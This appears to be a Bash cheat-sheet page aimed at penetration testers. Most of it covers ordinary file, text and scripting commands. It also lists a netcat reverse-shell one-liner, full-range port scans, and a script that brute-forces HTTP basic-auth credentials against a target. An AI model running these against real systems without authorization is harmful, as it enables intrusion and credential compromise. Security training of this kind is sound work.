Bash

Bash (Bourne Again SHell) is a powerful command-line interface and scripting language used widely in UNIX-like operating systems. It is essential for security professionals and penetration testers to harness the full potential of Bash for tasks such as automation, information gathering, and exploitation. This cheat sheet provides quick references and examples for using Bash effectively.

Basic Commands

File and Directory Operations

List files and directories: ls
Change directory: cd /path/to/directory
Create a directory: mkdir /path/to/directory
Remove a directory: rmdir /path/to/directory
Copy files: cp /path/to/source /path/to/destination
Move/Rename files: mv /path/to/source /path/to/destination
Delete files: rm /path/to/file

File Content Operations

View file content: cat /path/to/file
View file content page by page: less /path/to/file
Search inside files: grep 'search_term' /path/to/file
Count lines, words, and characters in a file: wc /path/to/file

Permissions

Change file permissions: chmod 755 /path/to/file
Change file ownership: chown user:group /path/to/file

Text Processing

awk

Print the first column: awk '{print $1}' file
Print specific columns: awk '{print $1, $3}' file
Pattern matching and printing: awk '/pattern/ {print $1}' file

sed

Substitute text in a file: sed 's/old/new/g' file
Delete lines matching a pattern: sed '/pattern/d' file

grep

Search for a pattern in files: grep 'pattern' file
Recursive search in directories: grep -r 'pattern' /path/to/directory

cut

Extract columns: cut -d':' -f1 /etc/passwd

sort

Sort lines in a file: sort file

uniq

Remove duplicate lines: uniq file

tr

Translate or delete characters: tr 'a-z' 'A-Z' < file

Network Operations

Network Scanning

Ping a host: ping -c 4 host
Scan open ports with netcat: nc -zv host 1-65535
Network enumeration with nmap: nmap -A host

File Transfers

Download a file with wget: wget http://example.com/file
Upload a file with curl: curl -T file ftp://example.com

Network Connections

Establish a TCP connection: nc host port
Open a reverse shell: nc -e /bin/bash host port

System Monitoring

Process Management

List running processes: ps aux
Terminate a process: kill PID
Force terminate a process: kill -9 PID

Disk Usage

Check disk space usage: df -h
Check directory size: du -sh /path/to/directory

Memory Usage

Check memory usage: free -h

Scripting Essentials

Variables

Define a variable: VAR_NAME="value"
Access a variable: $VAR_NAME

Conditionals

if [ condition ]; then
  # commands
elif [ condition ]; then
  # commands
else
  # commands
fi

Loops

For loop:

for item in list; do
  # commands
done

While loop:

while [ condition ]; do
  # commands
done

Functions

function_name() {
  # commands
}

Practical Examples

Basic Port Scan

#!/bin/bash
for port in {1..65535}; do
  timeout 1 bash -c "echo > /dev/tcp/127.0.0.1/$port" 2>/dev/null && echo "Port $port is open"
done

Directory Backup

#!/bin/bash
SOURCE="/path/to/source"
DEST="/path/to/destination/backup-$(date +%F).tar.gz"
tar -czvf $DEST $SOURCE

Log Parsing

#!/bin/bash
grep "ERROR" /var/log/syslog | awk '{print $1, $2, $5}'

Basic Authentication Brute Force

#!/bin/bash
for user in $(cat users.txt); do
  for pass in $(cat passwords.txt); do
    response=$(curl -s -o /dev/null -w "%{http_code}" -u $user:$pass http://target)
    if [ $response -eq 200 ]; then
      echo "Valid credentials: $user:$pass"
    fi
  done
done

Security Tips

Use absolute paths in scripts to avoid unexpected behaviors.
Validate inputs to prevent injection attacks.
Limit permissions and use sudo sparingly.
Log and monitor script activities.
Encrypt sensitive data in scripts.

PreviousCoding NextGo

Last updated 1 year ago

hashtagBasic Commands

hashtagFile and Directory Operations

hashtagFile Content Operations

hashtagPermissions

hashtagText Processing

hashtagawk

hashtagsed

hashtaggrep

hashtagcut

hashtagsort

hashtaguniq

hashtagtr

hashtagNetwork Operations

hashtagNetwork Scanning

hashtagFile Transfers

hashtagNetwork Connections

hashtagSystem Monitoring

hashtagProcess Management

hashtagDisk Usage

hashtagMemory Usage

hashtagScripting Essentials

hashtagVariables

hashtagConditionals

hashtagLoops

hashtagFunctions

hashtagPractical Examples

hashtagBasic Port Scan

hashtagDirectory Backup

hashtagLog Parsing

hashtagBasic Authentication Brute Force

hashtagSecurity Tips